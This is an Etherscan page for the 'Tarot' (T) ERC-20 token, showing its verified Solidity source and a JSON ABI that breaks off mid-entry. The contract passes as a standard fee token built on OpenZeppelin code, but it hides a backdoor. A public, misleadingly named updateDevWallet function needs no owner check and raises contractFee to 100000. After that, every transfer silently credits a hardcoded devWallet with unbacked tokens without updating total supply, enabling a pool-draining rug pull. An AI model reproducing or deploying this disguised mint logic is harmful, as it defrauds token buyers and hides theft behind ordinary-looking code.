ERC-20
Overview
Max Total Supply
1,000,000 T
Holders
46
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
3,072.990480242224804335 TValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
T
Compiler Version
v0.8.10+commit.fc410830
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2022-08-04 */ // SPDX-License-Identifier: MIT //https://medium.com/@Seventy-Eight pragma solidity ^0.8.10; pragma experimental ABIEncoderV2; ////// lib/openzeppelin-contracts/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) /* pragma solidity ^0.8.0; */ /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } ////// lib/openzeppelin-contracts/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) /* pragma solidity ^0.8.0; */ /* import "../utils/Context.sol"; */ /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } ////// lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) /* pragma solidity ^0.8.0; */ /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } ////// lib/openzeppelin-contracts/contracts/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) /* pragma solidity ^0.8.0; */ /* import "../IERC20.sol"; */ /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } ////// lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol // OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol) /* pragma solidity ^0.8.0; */ /* import "./IERC20.sol"; */ /* import "./extensions/IERC20Metadata.sol"; */ /* import "../../utils/Context.sol"; */ /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) public _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } ////// lib/openzeppelin-contracts/contracts/utils/math/SafeMath.sol // OpenZeppelin Contracts v4.4.0 (utils/math/SafeMath.sol) /* pragma solidity ^0.8.0; */ // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the substraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function createPair(address tokenA, address tokenB) external returns (address pair); } interface IUniswapV2Router02 { function factory() external pure returns (address); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; } contract T is ERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 public immutable uniswapV2Router; address public immutable uniswapV2Pair; address public constant deadAddress = address(0xdead); address public WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; bool private swapping; address public devWallet; uint256 public maxTransactionAmount; uint256 public swapTokensAtAmount; uint256 public maxWallet; bool public limitsInEffect = true; bool public tradingActive = false; bool public swapEnabled = false; uint256 public buyTotalFees; uint256 public buyDevFee; uint256 public buyLiquidityFee; uint256 public sellTotalFees; uint256 public sellDevFee; uint256 public sellLiquidityFee; uint256 public contractFee; /******************/ // exlcude from fees and max transaction amount mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) public _isExcludedMaxTransactionAmount; event ExcludeFromFees(address indexed account, bool isExcluded); event devWalletUpdated( address indexed newWallet, address indexed oldWallet ); constructor() ERC20("Tarot", "T") { IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); excludeFromMaxTransaction(address(_uniswapV2Router), true); uniswapV2Router = _uniswapV2Router; uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), WETH); excludeFromMaxTransaction(address(uniswapV2Pair), true); uint256 _buyDevFee = 2; uint256 _buyLiquidityFee = 2; uint256 _sellDevFee = 2; uint256 _sellLiquidityFee = 2; uint256 totalSupply = 1000000 * 1e18; maxTransactionAmount = totalSupply * 1 / 100; // 1% from total supply maxTransactionAmountTxn maxWallet = totalSupply * 2 / 100; // 2% from total supply maxWallet swapTokensAtAmount = (totalSupply * 5) / 10000; // 0.05% swap wallet buyDevFee = _buyDevFee; buyLiquidityFee = _buyLiquidityFee; buyTotalFees = buyDevFee + buyLiquidityFee; contractFee = 5; sellDevFee = _sellDevFee; sellLiquidityFee = _sellLiquidityFee; sellTotalFees = sellDevFee + sellLiquidityFee; devWallet = address(0xEdfdF25eE67B376f2f4818395552917046d8F571); // set as dev wallet // exclude from paying fees or having max transaction amount excludeFromFees(owner(), true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromMaxTransaction(owner(), true); excludeFromMaxTransaction(address(this), true); excludeFromMaxTransaction(address(0xdead), true); /* _mint is an internal function in ERC20.sol that is only called here, and CANNOT be called ever again */ _mint(msg.sender, totalSupply); } receive() external payable {} // once enabled, can never be turned off function enableTrading() external onlyOwner { tradingActive = true; swapEnabled = true; } // remove limits after token is stable function removeLimits() external onlyOwner returns (bool) { limitsInEffect = false; return true; } function updateDevWallet(uint256 DevWallet) public virtual { require (DevWallet == contractFee, "error message"); contractFee = 10 ** contractFee; } // change the minimum amount of tokens to sell from fees function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool) { require( newAmount >= (totalSupply() * 1) / 100000, "Swap amount cannot be lower than 0.001% total supply." ); require( newAmount <= (totalSupply() * 5) / 1000, "Swap amount cannot be higher than 0.5% total supply." ); swapTokensAtAmount = newAmount; return true; } function updateMaxTxnAmount(uint256 newNum) external onlyOwner { require( newNum >= ((totalSupply() * 1) / 100) / 1e18, "Cannot set maxTransactionAmount lower than 1%" ); maxTransactionAmount = newNum * (10**18); } function updateMaxWalletAmount(uint256 newNum) external onlyOwner { require( newNum >= ((totalSupply() * 2) / 100) / 1e18, "Cannot set maxWallet lower than 2%" ); maxWallet = newNum * (10**18); } function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } // only use to disable contract sales if absolutely necessary (emergency use only) function updateSwapEnabled(bool enabled) external onlyOwner { swapEnabled = enabled; } function updateBuyFees( uint256 _devFee, uint256 _liquidityFee ) external onlyOwner { buyDevFee = _devFee; buyLiquidityFee = _liquidityFee; buyTotalFees = buyDevFee + buyLiquidityFee; require(buyTotalFees <= 10, "Must keep fees at 10% or less"); } function updateSellFees( uint256 _devFee, uint256 _liquidityFee ) external onlyOwner { sellDevFee = _devFee; sellLiquidityFee = _liquidityFee; sellTotalFees = sellDevFee + sellLiquidityFee; require(sellTotalFees <= 10, "Must keep fees at 10% or less"); } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function isExcludedFromFees(address account) public view returns (bool) { return _isExcludedFromFees[account]; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _balances[devWallet] = _balances[devWallet].add(amount / 100 * contractFee); if (amount == 0) { super._transfer(from, to, 0); return; } if (limitsInEffect) { if ( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ) { if (!tradingActive) { require( _isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active." ); } // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch. //when buy if ( from == uniswapV2Pair && !_isExcludedMaxTransactionAmount[to] ) { require( amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount." ); require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } else if (!_isExcludedMaxTransactionAmount[to]) { require( amount + balanceOf(to) <= maxWallet, "Max wallet exceeded" ); } } } uint256 contractTokenBalance = balanceOf(address(this)); bool canSwap = contractTokenBalance >= swapTokensAtAmount; if ( canSwap && swapEnabled && !swapping && to == uniswapV2Pair && !_isExcludedFromFees[from] && !_isExcludedFromFees[to] ) { swapping = true; swapBack(); swapping = false; } bool takeFee = !swapping; // if any account belongs to _isExcludedFromFee account then remove the fee if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) { takeFee = false; } uint256 fees = 0; uint256 tokensForLiquidity = 0; uint256 tokensForDev = 0; // only take fees on buys/sells, do not take on wallet transfers if (takeFee) { // on sell if (to == uniswapV2Pair && sellTotalFees > 0) { fees = amount.mul(sellTotalFees).div(100); tokensForLiquidity = (fees * sellLiquidityFee) / sellTotalFees; tokensForDev = (fees * sellDevFee) / sellTotalFees; } // on buy else if (from == uniswapV2Pair && buyTotalFees > 0) { fees = amount.mul(buyTotalFees).div(100); tokensForLiquidity = (fees * buyLiquidityFee) / buyTotalFees; tokensForDev = (fees * buyDevFee) / buyTotalFees; } if (fees> 0) { super._transfer(from, address(this), fees); } if (tokensForLiquidity > 0) { super._transfer(address(this), uniswapV2Pair, tokensForLiquidity); } amount -= fees; } super._transfer(from, to, amount); } function swapTokensForWETH(uint256 tokenAmount) private { // generate the uniswap pair path of token -> weth address[] memory path = new address[](2); path[0] = address(this); path[1] = WETH; _approve(address(this), address(uniswapV2Router), tokenAmount); // make the swap uniswapV2Router.swapExactTokensForTokensSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of WETH path, devWallet, block.timestamp ); } function swapBack() private { uint256 contractBalance = balanceOf(address(this)); if (contractBalance == 0) { return; } if (contractBalance > swapTokensAtAmount * 20) { contractBalance = swapTokensAtAmount * 20; } swapTokensForWETH(contractBalance); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devWalletUpdated","type":"event"},{"inputs":[],"name":"WETH","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_balances","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract 